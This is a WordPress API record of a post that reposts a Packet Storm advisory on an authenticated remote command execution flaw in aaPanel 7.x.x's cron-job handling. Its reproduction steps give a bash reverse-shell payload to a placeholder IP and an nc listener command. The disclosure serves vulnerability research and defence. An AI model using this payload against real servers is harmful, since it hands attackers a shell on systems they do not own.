{"id":18123,"date":"2025-09-19T13:19:58","date_gmt":"2025-09-19T13:19:58","guid":{"rendered":"http:\/\/localhost\/?p=18123"},"modified":"2025-09-19T13:19:58","modified_gmt":"2025-09-19T13:19:58","slug":"aapanel-7xx-remote-command-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=18123","title":{"rendered":"\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution_PACKETSTORM:209686"},"content":{"rendered":"

{“lastseen”:”2025-09-19T16:53:39″,”description”:”aaPanel version 7.x.x suffers from an authenticated remote command execution vulnerability. This was…”,”published”:”2025-09-19T00:00:00″,”modified”:”2025-09-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:209686″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-14421″],”sourceData”:”This is authenticated RCE.\\n \\n Vulnerability Description\\n \\n During my testing\/evaluation of aaPanel, I identified a flaw in how cron\\n jobs are handled, which enables an attacker to inject and execute arbitrary\\n commands remotely. Specifically:\\n \\n -\\n \\n An authenticated user can manipulate cron job entries in a way that\\n breaks out of the software to the server.\\n -\\n \\n This leads to the execution of malicious code on the server hosting\\n aaPanel, potentially compromising the entire system.\\n \\n Steps to Reproduce\\n \\n 1.\\n \\n Log in to the aaPanel dashboard\\n \\n 2.\\n \\n Create a new cron job with the payload: bash -c \\”bash -i \\u003e\\u0026 \/dev\/tcp\/XXXX\/1234 0\\u003e\\u00261\\” (XXXX is your ip)\\n \\n 3.\\n \\n Save the cron job and trigger it (or wait for the scheduled execution).\\n Start a listener on the other side to receive: nc -lvnp 1234\\n \\n 4.\\n \\n Observe the execution of the injected command on the server and RCE.\\n \\n Many thanks,\\n \\n Alasdair Gorniak\/Hamed Kohi”,”sourceHref”:”https:\/\/packetstorm.news\/download\/209686″,”cvss”:{“score”:9,”severity”:”HIGH”,”vector”:”AV:N\/AC:L\/Au:S\/C:C\/I:C\/A:C”,”version”:”2.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/209686\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-09-19T16:53:39″,”description”:”aaPanel version 7.x.x suffers from an authenticated remote command execution vulnerability. This was…”,”published”:”2025-09-19T00:00:00″,”modified”:”2025-09-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:209686″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-14421″],”sourceData”:”This is authenticated RCE.\\n \\n Vulnerability Description\\n \\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,86,12,15,13,53,7,11,5],"class_list":["post-18123","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-90","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution_PACKETSTORM:209686 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=18123\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution_PACKETSTORM:209686 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-09-19T16:53:39″,”description”:”aaPanel version 7.x.x suffers from an authenticated remote command execution vulnerability. This was…”,”published”:”2025-09-19T00:00:00″,”modified”:”2025-09-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:209686″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-14421″],”sourceData”:”This is authenticated RCE.n n Vulnerability Descriptionn n...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=18123\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-09-19T13:19:58+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18123#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18123\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution_PACKETSTORM:209686\",\"datePublished\":\"2025-09-19T13:19:58+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18123\"},\"wordCount\":319,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-9.0\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=18123#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18123\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18123\",\"name\":\"\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution_PACKETSTORM:209686 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-09-19T13:19:58+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18123#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=18123\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=18123#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution_PACKETSTORM:209686\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution_PACKETSTORM:209686 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=18123","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution_PACKETSTORM:209686 - zero redgem","og_description":"{“lastseen”:”2025-09-19T16:53:39″,”description”:”aaPanel version 7.x.x suffers from an authenticated remote command execution vulnerability. This was…”,”published”:”2025-09-19T00:00:00″,”modified”:”2025-09-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:209686″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-14421″],”sourceData”:”This is authenticated RCE.n n Vulnerability Descriptionn n...","og_url":"https:\/\/zero.redgem.net\/?p=18123","og_site_name":"zero redgem","article_published_time":"2025-09-19T13:19:58+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=18123#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=18123"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution_PACKETSTORM:209686","datePublished":"2025-09-19T13:19:58+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=18123"},"wordCount":319,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-9.0","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=18123#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=18123","url":"https:\/\/zero.redgem.net\/?p=18123","name":"\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution_PACKETSTORM:209686 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-09-19T13:19:58+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=18123#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=18123"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=18123#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution_PACKETSTORM:209686"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/18123","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18123"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/18123\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18123"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18123"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18123"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}